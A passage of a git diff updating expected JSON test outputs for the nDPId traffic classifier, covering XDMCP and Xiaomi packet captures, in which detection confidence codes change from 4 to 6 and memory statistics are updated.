+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1538467333581,"flow_last_seen":1538467333581,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1538467333581,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1538467333586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1538467333586,"pkt":"UlQAEjUACAAngNsFCABFAAA5uT5AAEARaW4KAQIECgECAgCx7\/IAJRg+AAEABQAXAAAAAAARV2lsbGluZyB0byBtYW5hZ2U="} 
00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1538467333586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1538467333586,"pkt":"CAAngNsFUlQAEjUACABFAADZIEMAAP8RgskKAQICCgECBO\/yALEAxWSsAAEABwC3AAAJAAAAAAAAAAAAAAAGAAYABgAGCQAExlrfKwAEwKg4AQAEqf5aAAAEqf5VYAAExj1eOQAQ\/oAAAAAAAAAUuwoXMyj2JAAQ\/oAAAAAAAAAND9alvNJ9SwAQ\/oAAAAAAAAClDBBzRudaAAAQ\/oAAAAAAAAChc6eH9dJVYAAAAAADABJNSVQtTUFHSUMtQ09PS0lFLTEAE1hETS1BVVRIT1JJWkFUSU9OLTEACVNVTi1ERVMtMQAA"} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1538467333581,"flow_last_seen":1538467336601,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1538467336601,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1538467333581,"flow_last_seen":1538467336601,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1538467336601,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"xdmcp.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":335,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1538467336601} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869617 bytes -~~ total memory freed........: 5869617 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6003251 bytes +~~ total memory freed........: 6003251 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 694 chars diff --git a/test/results/xiaomi.pcap.out b/test/results/xiaomi.pcap.out index d5ce5523b..5a7cad70b 100644 --- a/test/results/xiaomi.pcap.out +++ b/test/results/xiaomi.pcap.out 
@@ -2,48 +2,48 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639054136437} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1639054136437,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":136,"pkt_l4_len":98,"thread_ts_msec":1639054136437,"pkt":"AAAAAAAAAAIAAAAIgQAA0AgARRQAdj14QAAuBjXZL\/EHWAo0l6AUZpkMYD5IiLldMd2AGAA1w4IAAAEBCAqKynYNev32UML+AAUAAAA2AAIAFgAAABgIABoKeGlhb21pLmNvbSoEQ09OTkgACgo1Mzg2MzcwNzY5EgQ3ZjA0GgIIACIAfagLdw=="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1639054136437,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1639054136437,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":2,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":66,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":6,"global_ts_msec":1643625846975} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643625846975,"flow_last_seen":1643625846975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643625846975,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643625846975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643625846975,"pkt":"AAAAAAAAAA0AYH2pCABFFAA8AABAAC4G2JdzpErowKj02xRms1CUmJB5c0FIJ6ASaVAVsQAAAgQFUAQCCAri0mMlEWpVrAEDAwk="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643625847008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1643625847008,"pkt":"AAAAAAAAAAoAtbdgCABFAADsPqBAAEAGh1vAqPTbc6RK6LNQFGZzQUgnlJiQeoAYAKxOqAAAAQEIChFqVg7i0mMlwv4ABQAAAKwAAgAWAAAAjggAGgp4aWFvbWkuY29tKgRDT05OSAAIahINUmVkbWkgTm90ZSA5UxoRVjEyLjUuMi4wLlJKV01JWE0iKmEtRDdBNUQ4QTlCNTM3NTI5Rjk2NkU0MjlEMDU4ODYyMDMyNEY2QzVFMigqMg9tb2JpbGUtbHRlLXRhaWY6ETQ3LjI0MS4zNS43Mzo1MjIyQhBhcl9FR18jdS1udS1sYXRuSgIYAFAebjssqA=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625846975,"flow_last_seen":1643625847008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1643625847008,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625846975,"flow_last_seen":1643625847008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1643625847008,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1643625847088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643625847088,"pkt":"AAAAAAAAAA0AYH2pCABFFAB28\/pAAC4G5GJzpErowKj02xRms1CUmJB6c0FI34AYADWHawAAAQEICuLSY5YRalYOwv4ABQAAADYAAgAWAAAAGAgAGgp4aWFvbWkuY29tKgRDT05OSAAKCjMyNjg2ODQ5MzMSBDQ1MzkaAggAIgB79gtJ"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643625848421,"flow_last_seen":1643625848421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643625848421,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643625848421,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643625848421,"pkt":"AAAAAAAAAAMAPY54CABFFAA8AABAAC8G1WVzpErowKj3DRRmlIK6\/lCi\/G71lqASaVAKjgAAAgQFUAQCCArZ9CR01bLjhQEDAwk="} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643625848472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1643625848472,"pkt":"AAAAAAAAAAEAxKEDCABFAADTHaZAAD8GpzzAqPcNc6RK6JSCFGb8bvWWuv5Qo4AYAIDreAAAAQEICtWy5AnZ9CR0wv4ABQAAAJMAAgAWAAAAdQgAGgp4aWFvbWkuY29tKgRDT05OSAAIahIKTTIwMTBKMTlTRxoRVjEyLjAuOS4wLlFKUU1JWE0iKmEtQzVERjdDOEVDQ0ZGMzE3OEY5Mjk0REJDNzA1NzhCRUZDQTU5QTgzQygqMgR3aWZpOhE0Ny4yNDEuMzUuNzM6NTIyMkIFYXJfRUdKAhgAUB2r3iMF"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625848421,"flow_last_seen":1643625848472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1643625848472,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625848421,"flow_last_seen":1643625848472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1643625848472,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643625848565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643625848565,"pkt":"AAAAAAAAAAMAPY54CABFFAB2dEZAAC8GYOVzpErowKj3DRRmlIK6\/lCj\/G72NYAYADVuFAAAAQEICtn0JQPVsuQJwv4ABQAAADYAAgAWAAAAGAgAGgp4aWFvbWkuY29tKgRDT05OSAAKCjg0NDQ0MzU3NjcSBDcwOTgaAggAIgB8CwtM"} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1643625848723,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054136437,"flow_last_seen":1639054136437,"flow_idle_time":7580000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":1,"thread_ts_msec":1643625848723,"l3_proto":"ip4","src_ip":"47.241.7.88","dst_ip":"10.52.151.160","src_port":5222,"dst_port":39180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643625858130,"flow_last_seen":1643625858130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643625858130,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1643625858130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643625858130,"pkt":"AAAAAAAAAAUARa2GCABFFAA8AABAAC0GVvFhJ3eswKhdOxRmySBqbHLib20O5qASaVBi5QAAAgQFUAQCCAoVb3OrFqysdQEDAwk="} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1643625858163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1643625858163,"pkt":"AAAAAAAAAAUARa2GCABFAADeXtNAAEAG5I\/AqF07YSd3rMkgFGZvbQ7mamxy44AYAVdX7gAAAQEIChasrOMVb3Orwv4ABQAAAJ4AAgAWAAAAgAgAGgp4aWFvbWkuY29tKgRDT05OSAAIahIJTTIxMDFLN0JHGhJWMTIuNS4xNS4wLlJLTE1JWE0iKmEtQUM5NDFEMkFEQUQ4RkVDNEJGODYzMTRDQzhDNTE2Q0I3NkY2OTUyQSguMg9tb2JpbGUtbHRlLXRhaWY6ETQ3LjI0MS41OS44Nzo1MjIyQgVhcl9FR0oCGABQHn0CJwc="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625858130,"flow_last_seen":1643625858163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1643625858163,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643625858130,"flow_last_seen":1643625858163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1643625858163,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1643625858251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643625858251,"pkt":"AAAAAAAAAAUARa2GCABFFAB2BwBAAC0GT7dhJ3eswKhdOxRmySBqbHLjb20PkIAYADWSLgAAAQEIChVvdCQWrKzjwv4ABQAAADYAAgAWAAAAGAgAGgp4aWFvbWkuY29tKgRDT05OSAAKCjkyODQzNjUzNzESBGQzOGMaAggAIgB+7gui"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":3907,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1649839944752} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649839944752,"flow_last_seen":1649839944752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1649839944752,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1649839944752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649839944752,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MLBAAD8GlDbAqAJkA3+wSpNMFGaY8mRiAAAAAKAC\/\/+SoQAAAgQFtAQCCAodPXxCAAAAAAEDAwk="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1649839944776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649839944776,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAPMGEOYDf7BKwKgCZBRmk0xMrReHmPJkY6ASaN+IpwAAAgQFrAQCCAr78kDrHT18QgEDAwg="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1649839944780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1649839944780,"pkt":"eJS0JASgYDjgxTWgCABFAAA0MLFAAD8GlD3AqAJkA3+wSpNMFGaY8mRjTK0XiIAQAKwfgwAAAQEICh09fF\/78kDr"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649839944752,"flow_last_seen":1649839944782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649839944782,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625846975,"flow_last_seen":1643625847231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":928,"flow_tot_l4_payload_len":1284,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625858130,"flow_last_seen":1643625858384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1643625848421,"flow_last_seen":1643625997739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":914,"flow_tot_l4_payload_len":1269,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 